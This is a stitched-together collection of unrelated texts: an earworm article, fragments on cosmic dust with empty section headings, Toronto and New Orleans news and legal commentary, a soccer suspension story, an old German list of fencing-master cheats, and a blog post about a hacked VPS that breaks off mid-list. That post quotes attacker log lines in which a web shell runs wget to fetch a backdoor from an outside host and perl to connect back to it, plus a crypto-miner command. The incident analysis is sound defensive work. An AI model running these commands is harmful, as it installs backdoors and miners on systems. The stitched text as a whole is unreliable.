In the winter of 1900, six-year-old Nicolas Slonimsky was introduced to the world of popular Russian ditties. “Little bird, what did you do? I drank vodka, so did you,” he would warble to enchanted relatives. Isabelle Vengerova, his aunt, who was a famous teacher at the St. Petersburg Conservatory, discovered earlier that year that he possessed perfect pitch, and began giving him lessons. She believed that he was destined for musical greatness. Although Slonimsky's career as a musical prodigy never quite materialized, his early singing days made a lasting impression: Slonimsky was one of the first composers to explicitly decipher what made certain tunes irresistible. In the twenties, Oliver Sacks writes in “Musicophilia,” Slonimsky began creating musical patterns designed to “hook the mind and force it to mimicry and repetition.” In 1947, Slonimsky's insights were released as a book, “Thesaurus of Scales and Melodic Patterns,” which would go on to become an important musical influence for composers from John Coltrane to Frank Zappa.
Slonimsky didn't have a specific term for the types of compulsively catchy melodies he created, but one came into being in 1979: the German psychiatrist Cornelius Eckert described such tunes as “Ohrwürmer”—earworms. (The imagery has deep roots: “Musicophilia” notes that, centuries ago, an early folk-music manuscript referred to music that got stuck in your head as “the piper's maggot.”) While there still isn't a strict definition of what constitutes an earworm, it is generally considered to be a constant loop of fifteen to twenty seconds of music lodged in your head for at least a few hours, if not days—or, in severe cases, months.
Lauren Stewart, the founding director of the Music, Mind, and Brain program at Goldsmiths, University of London, first became fascinated by the phenomenon of earworms while driving to work one day in 2009. “There's a radio station in the U.K. called 6Music, and they have a breakfast show where they have a feature called ‘Earworms,' where people call in to say what music they woke up with in their heads,” she told me. At the time, she had been researching the cognitive neuroscience of music. Earworms, she realized, could offer insight into the way that the mind processes musical experiences. She asked the station to share its data. “Obviously people get earworms if they've just heard a song,” Stewart says. “What we wanted to know was: Were there any features over and above?” In other words, what gives birth to an earworm?
Shortly after her earworm-laden drive, Stewart began working with Daniel Müllensiefen, the co-director of the Music, Mind, and Brain program, and an expert in using computational tools to analyze the melodic features of music. As they waded through the 6Music database, they decided to gather additional data of their own, and created a site called the Earwormery, where people could share their earworm experiences. Over five years, their team compared thousands of songs reported as earworms to equally popular but less catchy tracks by analyzing underlying musical features, such as key and melody.
In still-to-be-published research, Stewart and Müllensiefen show that under the right circumstances, like hearing a song played multiple times in a day, “most songs can be earworms,” Stewart says. “But there do seem to be some that come up more than others.” A particular hallmark of earworms, Stewart discovered, is the presence of passages with closely spaced musical intervals and long notes. (In other words, a sequence in which the notes are close to each other on the music scale—such as C, C-sharp, and D—and each note is held for a moment before moving on to the next.) To help me understand what such a song would sound like, Stewart cited “Waterloo,” by ABBA. “In that passage”—here, she hummed the chorus for me—“see how closely spaced the notes are, and they are all of relatively long duration.” As I listened, sure enough, “Waterloo” burrowed into my head.
These modern insights about the construction of an earworm wouldn't have surprised Slonimsky. Though the “Thesaurus of Scales and Melodic Patterns” is composed almost entirely of musical notes, with no explanatory text after its six-page introduction, a musician would quickly discern that many of the patterns match the ones identified by Stewart and Müllensiefen. Slonimsky also intuited that “these progressions can be transposed to any tonal center according to a composer's requirement”—that the structure of an earworm is universal, from classical piano compositions to the bounciest pop song. It's no wonder then, that while not every hit track is an earworm, some contemporary artists—including Lady Gaga, Queen, Kylie Minogue, and the Beatles, Stewart notes—have made extensive use of that magic formula of interval and length.
The ubiquity of modern music and the resulting proliferation of earworms raise another question, though: How do you dislodge one? In a study that Stewart and the psychologist Victoria Williamson just published in the journal PLoS ONE, they examined thousands of survey responses to see what, if anything, was an especially effective method. While people's strategies for ridding themselves of unwanted aural guests fell into one of two broad categories—distraction or coping—the most successful way to remove an earworm, they found, was to deal with it head on, by intentionally listening to the song or singing it out loud, no matter how embarrassing the song.
But it may be futile to try to resist completely, if Stewart is correct about why we get earworms in the first place. In ongoing research with a team of neuroscientists at the University of Western Ontario, she says, “we're working with the hypothesis that people are getting earworms to either match or change their current state of arousal—or a combination of the two.” She adds, “Maybe you're feeling sluggish but need to take your child to a dance class, so it could be that an earworm pops into your hear that's very upbeat, to help you along. Or working in reverse, can earworms act to calm you down?” It would explain why we sometimes get earworms even when we haven't been listening to music at all, or why people who spend a great deal of time in nature often report beginning to hear every sound—wind blowing, leaves rustling, water rippling—as music, which their brain spontaneously plays over and over. Just as important, it would help explain why our brains often seem to linger on music that we don't particularly care for. Slonimsky would have expected as much: he never argued that the passages in his thesaurus always produced the most beautiful or appealing music—only that they were effective, as anyone who has listened to Swedish pop would know all too well.
Photograph: Vintage Images/Getty.
Study and importance Edit
Detection methods Edit
Radiative properties Edit
[20] HH 151 is a bright jet of glowing material trailed by an intricate, orange-hued plume of gas and dust. A dust particle interacts with electromagnetic radiation in a way that depends on its cross-section, the wavelength of the electromagnetic radiation, and on the nature of the grain: its refractive index, size, etc. The radiation process for an individual grain is called its emissivity, dependent on the grain's efficiency factor. Furthermore, we have to specify whether the emissivity process is extinction, scattering, absorption, or polarisation. In the radiation emission curves, several important signatures identify the composition of the emitting or absorbing dust particles. Dust particles can scatter light nonuniformly. Forward-scattered light means that light is redirected slightly by diffraction off its path from the star/sunlight, and back-scattered light is reflected light. The scattering and extinction ("dimming") of the radiation gives useful information about the dust grain sizes. For example, if the object(s) in one's data is many times brighter in forward-scattered visible light than in back-scattered visible light, then we know that a significant fraction of the particles are about a micrometer in diameter. The scattering of light from dust grains in long exposure visible photographs is quite noticeable in reflection nebulae, and gives clues about the individual particle's light-scattering properties. In X-ray wavelengths, many scientists are investigating the scattering of X-rays by interstellar dust, and some have suggested that astronomical X-ray sources would possess diffuse haloes, due to the dust.[21]
Stardust Edit
Main article: Presolar grains Stardust grains (also called presolar grains by meteoriticists[22]) are contained within meteorites, from which they are extracted in terrestrial laboratories. Stardust was a component of the dust in the interstellar medium before its incorporation into meteorites. The meteorites have stored those stardust grains ever since the meteorites first assembled within the planetary accretion disk more than four billion years ago. So-called carbonaceous chondrites are especially fertile reservoirs of stardust. Each stardust grain existed before the Earth was formed. Stardust is a scientific term referring to refractory dust grains that condensed from cooling ejected gases from individual presolar stars and incorporated into the cloud from which the Solar System condensed.[23] Many different types of stardust have been identified by laboratory measurements of the highly unusual isotopic composition of the chemical elements that comprise each stardust grain. These refractory mineral grains may earlier have been coated with volatile compounds, but those are lost in the dissolving of meteorite matter in acids, leaving only insoluble refractory minerals. Finding the grain cores without dissolving most of the meteorite has been possible, but difficult and labor-intensive (see presolar grains). Many new aspects of nucleosynthesis have been discovered from the isotopic ratios within the stardust grains.[24] An important property of stardust is the hard, refractory, high-temperature nature of the grains. Prominent are silicon carbide, graphite, aluminium oxide, aluminium spinel, and other such solids that would condense at high temperature from a cooling gas, such as in stellar winds or in the decompression of the inside of a supernova. They differ greatly from the solids formed at low temperature within the interstellar medium. Also important are their extreme isotopic compositions, which are expected to exist nowhere in the interstellar medium. This also suggests that the stardust condensed from the gases of individual stars before the isotopes could be diluted by mixing with the interstellar medium. These allow the source stars to be identified. For example, the heavy elements within the silicon carbide (SiC) grains are almost pure S-process isotopes, fitting their condensation within AGB star red giant winds inasmuch as the AGB stars are the main source of S-process nucleosynthesis and have atmospheres observed by astronomers to be highly enriched in dredged-up s process elements. Another dramatic example is given by the so-called supernova condensates, usually shortened by acronym to SUNOCON (from SUperNOva CONdensate[25]) to distinguish them from other stardust condensed within stellar atmospheres. SUNOCONs contain in their calcium an excessively large abundance[26] of 44Ca, demonstrating that they condensed containing abundant radioactive 44Ti, which has a 65-year half-life. The outflowing 44Ti nuclei were thus still "alive" (radioactive) when the SUNOCON condensed near one year within the expanding supernova interior, but would have become an extinct radionuclide (specifically 44Ca) after the time required for mixing with the interstellar gas. Its discovery proved the prediction[27] from 1975 that it might be possible to identify SUNOCONs in this way. The SiC SUNOCONs (from supernovae) are only about 1% as numerous as are SiC stardust from AGB stars. Stardust itself (SUNOCONs and AGB grains that come from specific stars) is but a modest fraction of the condensed cosmic dust, forming less than 0.1% of the mass of total interstellar solids. The high interest in stardust derives from new information that it has brought to the sciences of stellar evolution and nucleosynthesis. Laboratories have studied solids that existed before the Earth was formed.[28] This was once thought impossible, especially in the 1970s when cosmochemists were confident that the Solar System began as a hot gas[29] virtually devoid of any remaining solids, which would have been vaporized by high temperature. The existence of stardust proved this historic picture incorrect.
Some bulk properties Edit
Dust grain formation Edit
The large grains in interstellar space are probably complex, with refractory cores that condensed within stellar outflows topped by layers acquired subsequently during incursions into cold dense interstellar clouds. That cyclic process of growth and destruction outside of the clouds has been modeled[31][32] to demonstrate that the cores live much longer than the average lifetime of dust mass. Those cores mostly start with silicate particles condensing in the atmospheres of cool oxygen rich red-giant stars and carbon grains condensing in the atmospheres of cool carbon stars. The red-giant stars have evolved off the main sequence and have entered the giant phase of their evolution and are the major source of refractory dust grain cores in galaxies. Those refractory cores are also called Stardust (section above), which is a scientific term for the small fraction of cosmic dust that condensed thermally within stellar gases as they were ejected from the stars. Several percents of refractory grain cores have condensed within expanding interiors of supernovae, a type of cosmic decompression chamber. And meteoriticists that study this refractory stardust extracted from meteorites often call it presolar grains, although the refractory stardust that they study is actually only a small fraction of all presolar dust. Stardust condenses within the stars via considerably different condensation chemistry than that of the bulk of cosmic dust, which accretes cold onto preexisting dust in dark molecular clouds of the galaxy. Those molecular clouds are very cold, typically less than 50K, so that ices of many kinds may accrete onto grains, perhaps to be destroyed later. Finally, when the Solar System formed, interstellar dust grains were further modified by chemical reactions within the planetary accretion disk. So the history of the complex grains in the early Solar System is complicated and only partially understood. Astronomers know that the dust is formed in the envelopes of late-evolved stars from specific observational signatures. In infrared light, emission at 9.7 micrometres is a signature of silicate dust in cool evolved oxygen-rich giant stars. Emission at 11.5 micrometres indicates the presence of silicon carbide dust in cool evolved carbon-rich giant stars. These help provide evidence that the small silicate particles in space came from the ejected outer envelopes of these stars.[33][34] Conditions in interstellar space are generally not suitable for the formation of silicate cores. This would take excessive time to accomplish, even if it might be possible. The arguments are that: given an observed typical grain diameter a, the time for a grain to attain a, and given the temperature of interstellar gas, it would take considerably longer than the age of the Universe for interstellar grains to form.[35] On the other hand, grains are seen to have recently formed in the vicinity of nearby stars, in nova and supernova ejecta, and in R Coronae Borealis variable stars which seem to eject discrete clouds containing both gas and dust. So mass loss from stars is unquestionably where the refractory cores of grains formed. Most dust in the Solar System is highly processed dust, recycled from the material out of which the Solar System formed and subsequently collected in the planetesimals, and leftover solid material such as comets and asteroids, and reformed in each of those bodies' collisional lifetimes. During the Solar System's formation history, the most abundant element was (and still is) H 2 . The metallic elements: magnesium, silicon, and iron, which are the principal ingredients of rocky planets, condensed into solids at the highest temperatures of the planetary disk. Some molecules such as CO, N 2 , NH 3 , and free oxygen, existed in a gas phase. Some molecules, for example, graphite (C) and SiC would condense into solid grains in the planetary disk; but carbon and SiC grains found in meteorites are presolar based on their isotopic compositions, rather than from the planetary disk formation. Some molecules also formed complex organic compounds and some molecules formed frozen ice mantles, of which either could coat the "refractory" (Mg, Si, Fe) grain cores. Stardust once more provides an exception to the general trend, as it appears to be totally unprocessed since its thermal condensation within stars as refractory crystalline minerals. The condensation of graphite occurs within supernova interiors as they expand and cool, and do so even in gas containing more oxygen than carbon,[36] a surprising carbon chemistry made possible by the intense radioactive environment of supernovae. This special example of dust formation has merited specific review.[37] Planetary disk formation of precursor molecules was determined, in large part, by the temperature of the solar nebula. Since the temperature of the solar nebula decreased with heliocentric distance, scientists can infer a dust grain's origin(s) with knowledge of the grain's materials. Some materials could only have been formed at high temperatures, while other grain materials could only have been formed at much lower temperatures. The materials in a single interplanetary dust particle often show that the grain elements formed in different locations and at different times in the solar nebula. Most of the matter present in the original solar nebula has since disappeared; drawn into the Sun, expelled into interstellar space, or reprocessed, for example, as part of the planets, asteroids or comets. Due to their highly processed nature, IDPs (interplanetary dust particles) are fine-grained mixtures of thousands to millions of mineral grains and amorphous components. We can picture an IDP as a "matrix" of material with embedded elements which were formed at different times and places in the solar nebula and before the solar nebula's formation. Examples of embedded elements in cosmic dust are GEMS, chondrules, and CAIs.
From the solar nebula to Earth Edit
Some "dusty" clouds in the universe Edit
Dust sample return Edit
The Discovery program's Stardust mission, was launched on 7 February 1999 to collect samples from the coma of comet Wild 2, as well as samples of cosmic dust. It returned samples to Earth on 15 January 2006. In the spring of 2014, the recovery of particles of interstellar dust from the samples was announced.[51]
See also Edit
References Edit
Further reading Edit
Toronto Community Housing will see at least one more senior-level manager leave before the end of the week, the Star has learned. An announcement is expected as early as Wednesday and follows Friday's news that CEO and president Gene Jones had left as part of an agreement with the board for a change in leadership. The decision came after a scathing report from the city's ombudsman on troubling human resources practices.
Anand Maharaj, vice president of human resources, is among the TCHC executives who came in for criticism in Toronto ombudsman Fiona Crean's report, though described only by title.
Since Friday the board has been engaged in private and public discussions about ombudsman Fiona Crean's report, released last week. Friday's talks focused solely on Jones, according to a source, but on Monday board members turned the discussion to other staff. Crean's report highlights inconsistent hiring practices, pay hikes without evaluations and staff improperly promoted through the ranks. She called it an “abject failure of leadership from the top” with “senior executives ignoring policy and running an organization as though it were their own personal fiefdom.”
Article Continued Below
Crean and her staff included specific incidents in the report that also point fingers at other managers. In one instance, vice president of human resources Anand Maharaj (who is identified by title but not named in the report) is said to have told a lawyer he knew from a previous job to apply for a TCHC posting for director of labour relations. The report says Maharaj screened applicants without interviewing them and after meeting with the lawyer, she was given the position. That woman, Jennifer Bond (also not named in the report), became director of labour relations and legal counsel — an extra title added “at her own request,” the report says. The source said the ombudsman's report “contributed” to the board's decision to part with more senior staff, but was not the only reason for it. In February, the board confirmed it was investigating improper actions by Jones and possibly other senior managers.
Last week, Mayor Rob Ford actively defended Jones, calling — appearing at the board's announcement after he admitted to lobbying members on Jones' behalf. He called Crean's report “biased.” “This is one of the worst days in Toronto's history,” Ford told reporters. “The ombudsman —she's the one who should resign, she's the one who's political.”
Article Continued Below
Crean, at the public TCHC board meeting Friday, countered Ford's claim, saying report was focused on “human resources practices” and not the CEO. The source told the Star that Ford's criticism and concerns do not “factor” into the board's decision-making process.
Merritt Landry, a 33-year-old “white caucasian” shot the victim, a 14-year-old black boy, in the head. A single spent cartridge case was recovered at the scene, indicating that a semi-automatic weapon was used and suggesting that a single shot was fired. The hour of the shooting was approximately 2:00AM, on Friday, July 26, 2013. As of this writing the victim is reported to remain alive, in critical condition at a local hospital.
The victim was shot within feet from the rear door of Landry's dwelling in New Orleans, in an area accessible only by having to scale a locked fence, suggesting forcible entry onto the property by the victim.
A local resident and friend of Landry's, Charles Hazouri, had security cameras on the exterior of the home which appear to have recorded the victim and a friend riding their bicycles up and down the street at 1:44AM. Earlier in the evening, another neighbor had seen the apparent friend biking around the neighborhood at 8:00PM. This neighbor, like Landry a “white caucasian,” considered calling the police, but decided against this for fear of being perceived as having racially profiled a “kid who's just biking.”
The Hazouri recording purportedly shows the two teens talking in the middle of the street outside of Landry's house at about 1:44AM. One wore a dark tank top and the other wore a light tank top. The teen in the light tank top climbed over Landry's fence and into the yard. Landry's large dog began to bark, alerting Landry to the intruder.
An anonymous friend has stated that Landry's father reported his son believed he was shooting an intruder. In terms of the victim being an intruder upon secured property, this seems a reasonable perception. Whether the victim intended to intrude into the dwelling is not known, or that under the circumstances a reasonable person would have believed the victim was intending to do so, is less clear.
Hazouri reports that Landry, who has a baby daughter and whose wife is pregnant, believed that the victim was trying to break into his house. “All I know is that Merritt had told his family that he had said: ‘Freeze!' and it looked like the guy turned at him and had his hand on his hip,” Hazouri reported.
Landry has been charged with attempted second degree murder. His bond was set to $10,000; he posted bond late Friday afternoon. Landry works for the City of New Orleans as a building inspector. The city says he has been placed on emergency suspension without pay pending the outcome of this case.
LOSD Analysis
Disclaimer: This analysis is based upon the “facts” as reported by the news media. These “facts” so must therefore be assumed to be elastic, selected to fit a hidden narrative, and perhaps even outright false. Nevertheless, they are the only “facts” with which we have to work. As new information becomes available we will adjust our coverage and analysis accordingly.
Attempted Second Degree Murder
The attempted second degree murder charge is as blatant a piece of overcharging as was the second degree murder charge brought against George Zimmerman.
Under LRS 14:30.1 Second degree murder, there are four paths to a conviction on second degree murder. Two of these involve the distribution of drugs and can be discarded on their face. A third involves a killing during the course of committing a violent felony, and this also clearly does not apply to these facts.
The last path involves the offender with a specific intent to kill or to inflict great bodily harm. Although such intent can form quickly, and Louisiana's second degree murder charge does not incorporate the element of a “depraved murder” as is the case in Florida, it seems clear that Landry's only use of force was in a perceived need to act in self-defense.
That perception may have been unreasonable, and therefore self-defense may fail in this instance, but even then the killing can not have been second degree murder where the killer possessed a genuine (if unreasonable) belief that he must use deadly force in self-defense rather than the intentional mental state of committing a murder.
A more reasonable charge would have been manslaughter, under LRS 14:31, if the victim's intrusion into the property might be seen as adequate provocation, or perhaps negligent homicide under LRS 14:32.
LRS 14:19 Use of force or violence in defense
Landry will surely seek to advance self-defense against the charges. Louisiana has one self-defense statute for when the use of defensive force does not result in a death—LRS 14:19 Use of force or violence in defense—and a second self-defense statute for when the use of force does result in a death- LRS 14:20 Justifiable homicide.
As of this writing the victim remains alive, and the charge remains attempted murder rather than murder, so in this context we would look to LRS 14:19. Several sections of LRS 14:19 would seem to apply here.
First, LRS 14:19(A) provides that the use of defensive force is justifiable to prevent a forcible offense against a person or trespass against property. It states that the force must be reasonable and necessary under the circumstances, but does not explicitly limit the degree of force to non-deadly force. If, however, the person against whom the force was used actually does die, LRS 14:19 is no longer applicable and instead LRS 14:20 comes into play. If the defendant's apparent testimony that the victim turned towards him at being challenged and appeared to be reaching for a weapon is believed, the element of prevention of a forcible offense against a person will have been met.
Second, LRS 14:19(B) provides a legal presumption of a reasonable belief that the use of force was necessary if the person using the defensive force was inside his dwelling and the force was necessary to prevent unlawful entry into the dwelling or to compel an unlawful intruder to leave the premises. The facts do not suggest that the victim here was actually inside the dwelling, but rather was a few feet from the door to the dwelling. There are two conditions to this presumption. First, that the victim either had or was in the process of unlawfully entering the dwelling, and second that the person using defensive force had reason to believe that an unlawful entry had, or was about to, occur. It seems likely that Landry will claim that he believed his use of force was necessary to prevent the victim's unlawful entry into the dwelling.
The presence of an unknown person immediately outside one's backdoor at 2:00AM, under circumstance that would have required them to scale a fence in order to be so situated, would seem to allow a reasonable belief that an unlawful entry into the dwelling was intended.
Alternatively, depending on how Louisiana defines “dwelling” and “curtilage” for defenses purposes, the defendant may also rely on the claim that he reasonably believed the force was necessary to compel the victim to leave. This seems a more tenuous defense, however.
Finally, 14:19(C) is Louisiana's Stand-Your-Ground law in the context of non-fatal defensive force, relieving the defendant of any generalized duty to retreat, and 14:19(D) prohibits the jury from even considering whether retreat was possible.
LRS 14:20 Justifiable homicide
But what if the victim in this matter dies? Then 14:19 goes out the window, and we turn to LRS 14:20 Justifiable homicide.
14:20(A)(1) provides, succinctly, that a homicide is justifiable “When committed in self-defense by one who reasonably believes that he is in imminent danger of losing his life or receiving great bodily harm and that the killing is necessary to save himself from that danger.” If Landry's claim that the victim here turned and being challenged and appeared to be reaching for a weapon is believed, and particularly under the circumstances of the hour of night and the need for the victim to have scaled a locked fence, (A)(1) would appear to fit the facts well.
Section (A)(2) justifies a homicide when committed to stop a forcible felony involving danger of death or great bodily harm. Interestingly, it does not require that the person using force be in reasonable fear of death or great bodily harm, only that these are possible dangers of the violent felony. This section does, however, require that the use of defensive force reasonably believe that an attempt to prevent the forcible felony without killing would expose him to a serious danger to his own life or person.
The state may argue that the victim was merely attempting to break into Landry's car, rather than enter the dwelling. A car break-in does not usually involve an act of violence against a person, and car break-in is not explicitly listed in LRS 14:2 Definitions as among the states' defined “crimes of violence.” The defense could well respond, however, that this was not a simple car-break in, that the car's position within feet of Landry's door and the need for the victim to have scaled a locked fence transforms what might otherwise have been a relatively innocuous car break-in to a crime that, like a burglary, substantially raises the risk that the thief may be confronted by the car owner and violence erupt.
Section (A)(3) is Louisiana's Make-My-Day law, and justifies a killing of a person believed to be likely to use any unlawful force against someone in a dwelling, while that person is committing or attempting to commit a burglary or robbery of the dwelling. Whether the facts, as they develop, can support a reasonable belief that the victim here was attempting to commit a burglary of the dwelling shall be seen.
Section (A)(4) justifies the killing by a person lawfully inside a dwelling of another who either has or is attempting to unlawfully enter that dwelling. Again, we will need to see whether the facts support a reasonable belief on Landry's part that the victim was attempting to unlawfully enter the dwelling.
Section (B) of 14:20 creates a legal presumption that an occupant of a dwelling had a reasonable belief that the use of deadly force was necessary to prevent unlawful entry by, or compel the departure of, an intruder into that dwelling if two conditions are met: first, the intruder either had or was attempting to enter the dwelling forcibly and second the person using defensive force reasonably believed the intrusion to be unlawful.
Section (C) is Louisiana's Stand-Your-Ground law in the context of a fatal use of defensive force, and section (D) prohibits the jury from even considering whether retreat was possible.
9:2800.19 Limitation of liability for use of force in defense of certain crimes
Finally, it is noteworthy that Louisiana has a self-defense immunity statute, 9:2800.19 Limitation of liability for use of force in defense of certain crimes. Unlike Florida's 776.032 Immunity from criminal prosecution and civil action for justifiable use of force, however, Louisiana's statute applies only to civil liability where the defendant's conduct was found justified under 14:19 or 14:20. Like Florida's, it provides that the civil trial court shall (not may) attorneys fees, court costs, and even compensation for loss of income and “all expenses” to the defendant in a civil action where self-defense immunity is found to apply.
Look to Legal Insurrection for Continued Coverage of Landry Case
In summary, we'll be following the Landry case just as closely as we did Zimmerman. Keep your eyes here for the latest and greatest new information and legal analysis.
The Seattle Sounders will have to do without Clint Dempsey for the remainder of the month of June.
Major League Soccer announced on Friday that Dempsey has been suspended three games and fined an undisclosed amount for his conduct toward a match official during a Lamar Hunt US Open Cup match against the Portland Timbers at Starfire Stadium on Tuesday night.
The confrontation began in the 113th minute of extra time, with Seattle trailing their Cascadia rivals 2-1 and down to nine men following a red card to Brad Evans and an injury to Obafemi Martins. Dempsey came on in the 71st minute of what would be a 3-1 defeat (FULL HIGHLIGHTS).
Following a red card to Michael Azira for a challenge on Timbers' forward Gaston Fernandez that left Seattle with eight players, Dempsey took referee Daniel Radford's notebook and threw it to the turf, drawing a yellow card for dissent in the 114th minute. He then picked up the notebook and tore it up, drawing a straight red card for abuse, according to the official match report.
“We do not tolerate conduct of this nature from any of our players,” MLS Deputy Commissioner Mark Abbott said in a statement. “No matter how passionate our players are or what happens in the ‘heat of the moment,' they must always respect all aspects of the game, especially the referees. In light of Clint's actions and our past precedents, we felt that a significant suspension was appropriate.”
While the incident took place outside MLS league competition, any alleged actions by a professional player against a referee during Open Cup competition is adjudicated and disciplined by the professional league. In this case MLS had jurisdiction to review the incident and levy sanctions per Policy 202(1)(H)-2 in the U.S. Soccer Policy Manual.
The US Open Cup Adjudication and Disciplinary Panel is responsible for handing down sanctions pertaining to Open Cup play.
According to the Policy Manual, the charge of Referee Abuse carries a minimum three-game suspension, with the suspended individual precluded from participating in any soccer competition until the suspension has expired.
Get more Seattle news at SoundersFC.com
Dempsey will not be available for Sounders matches against San Jose (6/20), Philadelphia (6/24) and Portland (6/28). He will conclude his suspension in time to join the US national team for the Gold Cup, which begins on July 7.
As of Friday afternoon, the US Open Cup Adjudication and Disciplinary Panel had gathered evidence, including the report of the referee and the match commissioner, video of the incident, and was conducting interviews with the relevant parties, according to U.S. Soccer. A hearing will be conducted next week, and any decision made by the Panel on further sanctioning will pertain only to future Open Cup tournament competition.
Georg Paul Hönn was a very popular author in the 17th and 18th century his books on people cheating had been published several times. The first edition is from 1721 the one the image here is from is published in 1753. He was lawyer and popular writer, born 12 June 1662 in Nuremberg as the son of a council member. After 1678-80 he went to Altdorf and Groningen and studied the rights, he traveled through the major European countries, was awarded in 1685 in Altdorf with legal Doctor title. He died in the age of 85 in Coburg.
Exercitienmeister betrügen –
1) Wenn Sie ihre Schüler sowohl im Fechten als Tanzen mit Fleiß lange aufhalten und solche nicht trefflich unter weisen.
2) Wenn sie allzu ungleiche in der Kunst mit einander contra fechten lassen, damit der Schwächere ausgelacht werde oder eines davon tragen möge.
3) Wenn sie ihre Schüler wissentlich untüchtige Rapiere in die Hände geben, welche oft beym ersten Stoß zerspringen, und den Fechtern nicht geringen Schaden zufügen, diese aber sodann solche bezahlen müssen
4) Wenn sie, da sie sehen, dass die Schüler aufeinander los gehen und einen gefährlichen Streich tun, nicht gleich dazwischen springen, sondern etwa den, welchen sie nicht wohl wollen, ein blaues Auge davon tragen lassen.
5) Wenn sie als sogenannte Klopf- oder Federfechter die rechte Fechtkunst nicht verstehen, und sich doch als Fechtmeister ausgeben.
6) Wenn sie ihre Tänze, für Tänze neuster Façon, die sie erst neulich aus Paris, gebracht hätten ausgeben, ungeachtet, dass solche schon seit vielen Jahren in Deutschland gebräuchlich gewesen sind.
7) Wenn sie aus ihre Schüler im Tanzen nicht wohl Acht haben, ob sie auch die Cad ence halten, die Pas, Contretemps und dergleichen Tanz Manieren recht treffen, nur damit sie desto länger bei ihnen zu ihrer Perfektionierung das Tanzen treiben mögen.
8) Wenn sie aus denen Teatris, da sie ein Ballet in Komödie oder Oper machen müssen, sich sonderlich in Gegenwart fürstlicher Personen und fremder Herrschaften austeilen, als ob sie einen unglücklichen Sprung getan und den Arm zerbrochen oder eine Ader verrenkt hätten, damit die Zuschauer Ihnen aus Commiseration eine gute Beisteuer geben mögen.
9) Wenn Sie öfters, ihre Schüler Bälle zu halten veranlassen, damit sie bei solchem Schmaus, oder durch dergleichen Gelegenheit desto größerer Anzahl Schüler bekommen mögen.
Masters of the Exercises cheat
If they let their students waste their time both in fencing and dancing with long exercises (workouts) and do not give them excellent instructions. If they let fight students too unequal in the art with each other, so that the weaker will be laughed at, or may receive something (a wound or a scar). If they give their students knowingly inappropriate rapiers in their hands, which often burst at the first thrust, and which may inflict not minor damage to the fencers, but instantly the students have to pay them. If they, as they see that students get going at each other and do a dangerous strike, do not jump right in between, but let the one, who they probably do not like, wear black eye from it. If they are s so-called Klopf- or Federfechter (show- and prize-fencers) not understand the right fencing, and yet present themselves as fencing masters. If they declare their dances as dances of the latest fashion, which they had brought only recently from Paris, notwithstanding that such have already been in use in Germany for many years. If they do not care of their students in dance, whether they keep the correct Cadence, the Pas, Contretemps, and the like dance manners, just make the students longer stay with them to their “perfecting” in dancing. If they in theater, when they have to make a ballet in comedy or opera, in the presence of princely persons and foreign important persons make a show, as if she had done an unfortunate jump and got broken arm or a tendon had been dislocated, so that viewers may give them a generous tip of commiseration. If they encourage their students to keep balls (have parties), that they may obtain at such a feast, or the like occasion all the greater number of students.
Hi everyone,
Just recently I published my technical goals for 2014 and one of them was to learn more about security. Well it couldn't have been more appropriate, my Virtual Private Server (VPS) just got hacked, for the second time (I use the VPS to host a Java web application). The first time, I basically rebuilt my server and hardened security as much as I could, but it didn't work (more on what I did later). I'm not really a system administrator nor do I have much experience on the matter so I guess I must learn my lessons either studying or by being stung.
What happened
My VPS was being used to mine bitcoins, I believe. If you never heard of bitcoins, check Wikipedia
How did I found out something was wrong?
My VPS is configured to send me an email alert when CPU usage is above 90% for more than 2 (two) hours, which was what happened. I received an email by 20.30 last night (Jan, 17 – 2014)
I logged in my VPS and used the top command to find that a single process was using all CPU, this was the culprit:
14915 ? Ssl 710:07 ./logrotate -o stratum+tcp://bat.minersbest.com:10470 -u apapun.seattle -p x –threads=4 –background
Never heard of something like that, but with a bit of googling I traced it to bitcoin mining.
As I said at the beginning this was the second time my server got hacked (using the same method I believe ), so this time I really had to figure what went wrong as I wasn't going to do everything from scratch again!
The first time my server was hacked I rebuilt it from scratch with the following steps to increase security:
Install a newer CentOS version
Update all packages
Disable root login via SSH
Disable password login via SSH (only private keys)
Setup firewall to block all traffic except port 80 (HTTP), 443 (HTTPS) and 22 (SSH)
Install Fail2Ban
Change the user and root password to even more secure passwords (more than 15 chars each)
I thought I had it covered…
I tried checking the SSH log at /var/log/secure and found that lots of attempts were made to login with different users (with common names like admin, oracle, weblogic, postgres, etc…) but none seemed to have succeeded as I had setup only private key login.
Could it be that someone found a vulnerability in my web application? Oh boy…
I have a setup where Jboss hosts the web application and Apache proxies and handles the SSL stuff.
Checking Apache Logs
I went on and checked the Apache access logs (in /var/log/httpd/access_log) around the time the CPU first went off and found something interesting
114.79.12.168 – – [17/Jan/2014:18:15:26 +0000] “GET /a/pwn.jsp?cmd=cat%20/proc/cpuinfo HTTP/1.1” 200 540 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36”
A GET request to /a/pwn.jsp with a parameter cat /proc/cpuinfo… like this JSP was some kind of web shell.. and it got a 200 OK response? No way…
Back to the browser to check and surely enough, the server responded with an empty page… Next check… I try /a/pwn.jsp?cmd=ls and ouch… the directory listed…
Ok, so let's check the full log using the following command (trimmed for readability)
cat /var/log/httpd/acess_log | grep ‘pwn.jsp'
[17/Jan/2014:18:15:26 +0000] “GET /a/pwn.jsp?cmd=cat%20/proc/cpuinfo
[17/Jan/2014:18:15:36 +0000] “GET /a/pwn.jsp?cmd=ps%20x
[17/Jan/2014:18:15:41 +0000] “GET /a/pwn.jsp?cmd=ls%20-al
[17/Jan/2014:18:15:52 +0000] “GET /a/pwn.jsp?cmd=wget%20pdd-nos.info/.tmp/back.conn.txt%20-O%20bd
[17/Jan/2014:18:16:05 +0000] “GET /a/pwn.jsp?cmd=perl%20bd%20pdd-nos.info%2011457
[17/Jan/2014:18:17:44 +0000] “GET /a/pwn.jsp?cmd=ps%20x
[17/Jan/2014:18:18:23 +0000] “GET /a/pwn.jsp?cmd=ps%20x
[17/Jan/2014:18:27:57 +0000] “GET /a/pwn.jsp?cmd=ps%20x
With a little cleaning and url decode, you get the following list of commands:
cat /proc/cpuinfo ps x ls -al wget pdd-nos.info/.tmp/back.conn.txt -O bd perl bd pdd-nos.info 11457 ps x kill 14873 ps x ps x
Interesting to see is that the web shell appears to be just a means to and end, because the wget used in step 4) downloaded something that was used in step 5) by the perl interpreter, I checked the pdd-nos.info link and found what appears to be a some kind of backdoor shell and I assume this was what was used to launch the bitcoin mining process.
Breach detected
Ok, so I have a problem, a big one. And I need to do two things:
Eliminate the threat so that my VPS is once again my VPS 🙂
